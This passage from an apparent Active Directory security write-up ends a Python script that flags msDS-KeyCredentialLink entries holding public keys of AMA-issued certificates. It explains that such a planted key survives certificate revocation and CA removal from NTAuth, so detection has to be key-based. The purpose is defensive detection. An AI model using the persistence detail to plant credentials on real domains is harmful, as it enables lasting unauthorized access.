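SAMPLE_DN = "CN=NTTEST-CL-01,OU=Workstations,DC=nttest,DC=chrisse,DC=com"
SAMPLE_VALUE = build_key_credential(SAMPLE_MODULUS, 65537, uuid.uuid4(), SAMPLE_DN)
AMA_ISSUED_KEYS = {(SAMPLE_MODULUS, 65537): "AMA cert CN=DEMO4 from Chrisse Issuing CA 1"}

if __name__ == "__main__":
    for owner, label in find_matching_keys([SAMPLE_VALUE], AMA_ISSUED_KEYS):
        print(f"ALERT {owner}: msDS-KeyCredentialLink holds the public key of {label}")
```

Matching on (modulus, exponent) rather than on certificate thumbprint or issuer is deliberate: the KDC's key trust only looks at the public key, so a key planted in msDS-KeyCredentialLink keeps working after the certificate is revoked or even after the issuing CA is removed from NTAuth, which is exactly why the scan has to be key-based. The key_id_ok and key_hash_ok flags are worth reporting as well; a value whose hashes do not verify was written by something other than the Windows key provisioning path.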